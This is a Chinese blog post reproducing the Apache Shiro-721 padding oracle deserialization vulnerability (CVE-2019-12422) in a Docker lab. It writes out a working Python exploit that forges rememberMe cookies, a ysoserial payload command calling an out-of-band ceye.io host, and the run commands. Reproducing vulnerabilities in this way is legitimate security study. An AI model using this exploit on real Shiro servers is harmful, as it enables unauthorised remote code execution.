shiro721复现

最新推荐文章于 2024-04-20 23:59:16 发布
最新推荐文章于 2024-04-20 23:59:16 发布
阅读量366 收藏 3
点赞数
分类专栏: java 文章标签: docker java 容器 开发语言 ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web15286201346/article/details/126496218
版权
本文详细介绍了如何在Apache Shiro 1.4.2版本中利用PaddingOracleAttack漏洞,涉及环境搭建、原理解析和实际复现步骤,包括使用ysoserial工具和ShiroExploit.jar进行攻击。
摘要由CSDN通过智能技术生成

转载至

shiro721复现 - qianxinggz - 博客园 (cnblogs.com)

转载文章也是参考https://github.com/inspiringz/Shiro-721

目录

前言#

花费了2/3day的时间复现和了解这个漏洞,其挖掘的思路涉及到的密码学知识挺有意思的,叫做Padding Oracle Attack,可以在公开的exp中看到这个思路。但是该漏洞的利用却十分鸡肋,它的加密方式决定了我们发送的payload越长,爆破方式去加密payload的过程越长。不建议花费时间去研究利用,exp可以学学。

一、环境搭建和知识储备#

1.1、影响版本#

Apache Shiro < 1.4.2

CVE-2019-12422

1.2、Docker搭建环境#

1、获取DOCKFILE

git clone https://github.com/3ndz/Shiro-721.git cd Shiro-721/Docker

2、构建和运行DOCKFILE

docker build -t shiro-721 . //不要忽略721后面的那个点,意为当前路径 docker run -p 8080:8080 -d shiro-721

3、注意事项
环境搭建主要采用了网上github存在的一个镜像,复现时遇到一些问题

https://github.com/3ndz/Shiro-721

这个docker镜像中存在的war包中的lib主要是Common-Collections3.2.2的,正好是漏洞修复了的版本,不存在可利用的cc链。因此我们要下载一个Common-Collections3.1放至生成的docker对应的tomcat目录下。

docker cp /root/Common-Collections3.1.jar [dockerid]:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/Common-Collections3.1.jar

同时还要删除原来的Common-Collections3.2.2版本的jar包防止干扰

1.3、漏洞原理#

漏洞原理没有做深入探究,看了两篇文章做了一个了解。如下

浅析Shiro Padding Oracle Attack
Padding oracle attack详细解析
根本原理就是shiro中cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。攻击者可以使用有效的RememberMe cookie作为Padding Oracle Attack 的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击。

二、复现过程#

1、整体思路#

访问登录页面,登录
请求account页面,只需要抓包时能获取到rememberMe=xxx都可
利用exp爆破payload的加密密文
获取密文后对之前请求的页面以rememberMe=xxx的格式重放
获取到命令执行结果

2、具体流程#

1、勾选Remermber Me,登录shiro认证后的页面

2、登录后点击account页,抓包获取rememberMe对应的cookie值

3、使用ysoserial生成payload,前提是环境中存在可利用的链
这里命令用双引号括起来,暂时还没有深入研究ysoserial,用单引号存在问题

java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsBeanutils1 "xxx.ceye.io" > payload.class

4、利用公开exp使用Padding Oracle方式爆破payload的密文

#https://github.com/3ndz/Shiro-721
# -*- coding: utf-8 -*-
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        somecookie = b64encode(b64decode(unquote(sys.argv[2])) + data)
        self.session.cookies['rememberMe'] = somecookie
        if self.session.cookies.get('JSESSIONID'):
            del self.session.cookies['JSESSIONID']
        while 1:
            try:
                response = self.session.get(sys.argv[1],
                        stream=False, timeout=5, verify=False)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...',
                                  self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)
        if response.headers.get('Set-Cookie') is None or 'deleteMe' not in response.headers.get('Set-Cookie'):
            logging.debug('No padding exception raised on %r', somecookie)
            return
        raise BadPaddingException


if __name__ == '__main__':
    import logging
    import sys

    if not sys.argv[3:]:
        print 'Usage: %s <url> <somecookie value> <payload>' % (sys.argv[0], )
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)
    encrypted_cookie = b64decode(unquote(sys.argv[2]))
    padbuster = PadBuster()
    payload = open(sys.argv[3], 'rb').read()
    enc = padbuster.encrypt(plaintext=payload, block_size=16)
    print('rememberMe cookies:')
    print(b64encode(enc))

5、使用以下命令执行脚本,地址为登录后的需要提交cookie的页面

python shiro_exp.py http://192.168.164.152:8080/account [rememberMeCookie] payload.class

6、经过漫长的等待(起码3个小时不间断的请求),获取到了最终爆破出来的经过加密的payload,我们将这个payload加上rememberMe在之前的页面重放

7、最终在docker里的/tmp目录创建了文件

三、工具利用#

使用ShiroExploit.jar#

没有验证过,因为时间太长,不适用于实际环境的测试。会把环境打崩或者ip被ban

web15286201346
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shiro反序列化原理及完整复现流程(Shiro-550/Shiro-721
Continuejww的博客
09-27 785
Apache Shiro是一个强大且易用的**Java安全框架,**能够用于身份验证、授权、加密和会话管理。Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击,例如SHIRO-550。 0x01重现此问题的步骤: 登录网站,并从cookie中获取RememberMe。 使用RememberMe cookie作为填充Oracle Attack的前缀。 加密ysoserial的序列化有效负载,以通过填充Oracle Attack制作精心制作的RememberMe。 请求带有新的RememberMe cookie的网站,以执行反序列化攻击。 攻击者无需知道RememberMe加密的密码密钥。
Shiro-721---漏洞复现
qq_50854662的博客
04-28 1035
shiro 721-----漏洞复现
shiro-721漏洞复现
qq_53409748的博客
03-28 720
Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。
shiro-721反序列化漏洞复现
weixin_63960760的博客
08-22 1057
密码分组链接模式(Cipher Block Chaining,CBC),其中“分组"是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。"链接”是指密文分组像链条一样相互连接在一起。
Shiro历史漏洞复现 - Shiro-721
HAKUNAMATATATTA的博客
01-04 1966
由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。由于漏洞利用需要一个合法的登录账号,这里利用账号正常登陆获取一个有效的rememberMe cookie ,并记录下这个rememberMe的值。爆破成功,返回了rememberMe cookies的值。
shiro反序列化复现.zip
08-03
"shiro反序列化复现.zip"这个压缩包很可能是为了帮助开发者或者安全研究人员理解并重现Apache Shiro中的反序列化漏洞。 反序列化漏洞通常发生在程序接收来自不可信源的序列化对象时,如果这个对象包含了恶意构造的...
ApacheShiro复现记录1
08-08
Apache Shiro复现记录1 Apache ShiroJava应用程序中常用的身份验证和授权框架,但是在某些情况下,可能会遭受反序列化攻击。下面是关于Apache Shiro复现记录的详细知识点: 1. Apache Shiro简介 Apache Shiro是...
Shiro_721_Padding_Oracle_RCE:Shiro_721 exp 纯手工实现Padding Oracle整个过程
04-24
Shiro-721 Padding Oracle RCE Exp 免责声明:本工具仅供安全测试学习用途,禁止非法使用 纯手工实现Padding Oracle过程, 没有利用python-paddingoracle的api,可用于学习padding oracle细节。 默认采用jrmp gadget, 可以在脚本中自行更换,但是不建议,除非目标环境需要,因为padding oracle的耗时依赖于待加密payload的长度,jrmp长度相对较短。 测试环境:官方demo就可以了。 参考链接: Usage: python3 shiro_oracle_padding.py <target> <regular>
ShiroExploit-Deprecated:Shiro550Shiro721一键化利用工具,支持多种回显方式
03-21
2019.11.9更新: 由于当初作者开发时能力有限,导致工具本身存在着重重和问题矛盾等多重矛盾。目前有很多其他的优秀工具提供了对shiro检测/利用更好的支持(如更好的回显支持,更有效的小工具与直接支持内存外壳等),此工具当前已相形见绌。请各位移步其他更优秀的项目,感谢各位的使用。 2019.9.20更新: 对回显方式进行了一次更新,希望现在能好用一点 2020.9.12更新: 很多回显方式在本地测试OK,但是在实际环境中却不行,这个问题我不知道该怎么解决,希望有师傅可以指导下或者一起讨论下。 ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 初步:按要求输入要检测的目标URL和选择突破类型 Shiro550提供rememberMe Cookie, Shiro721需要提供一个有
Apache-Shiro反序列化1
08-03
复现该漏洞,需要使用 Docker 环境,安装 Apache Shiro 版本,并使用 Burp 工具抓包测试。下面是复现步骤: 1. 安装 Docker 环境,并 pull medicean/vulapps:s_shiro_1 镜像。 2. 运行 Docker 容器,暴露 8080 ...
【网络安全---漏洞复现shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程)
m0_67844671的博客
09-25 3210
shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程);详细还原了漏洞和漏洞利用方式;Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Shiro-721反序列化漏洞复现总结
weixin_44283446的博客
04-20 5521
Shiro-721反序列化漏洞复现及漏洞利用复现总结前言Shiro-721反序列化漏洞原理影响版本环境搭建环境说明搭建复现 前言     Apache Shiro的一些版本上存在一些高危代码执行漏洞,Apache Shiro提供的RememberMe字段,Shiro-550和Shiro-721(Apache Shiro Padding Oracle Attack)是常见的Shiro反序列化漏洞,Shiro-550的复现可以查看上一篇blog:https://blog
Shiro721漏洞复现(自动化工具使用&&详细教程)
m0_52701599的博客
03-26 1650
Shiro721漏洞复现(自动化工具使用&&详细教程)
复现shiro721漏洞
AmeV_ll的博客
03-26 341
Apache Shiro框架提供了(RememberMe),用户登录成功后会生成经过加密并编码的cookie,cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理 服务端在接收cookie时: 1、检索RememberMe Cookie的值 2、Base64解码 3、AES解密(加密密钥硬编码) 4、进行反序列化操作(未过滤处理) 5、攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造
shiro 历史漏洞复现
最新发布
m0_66490812的博客
04-20 224
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。shiro-721 代码执行。
shiro550复现
09-06
对于复现shiro550漏洞,您可以按照以下步骤进行操作: 1. 确定您的环境:首先,您需要一个Java开发环境(如JDK)以及一个Web服务器(如Tomcat)来运行应用程序。 2. 下载Shiro:从Apache Shiro官方网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值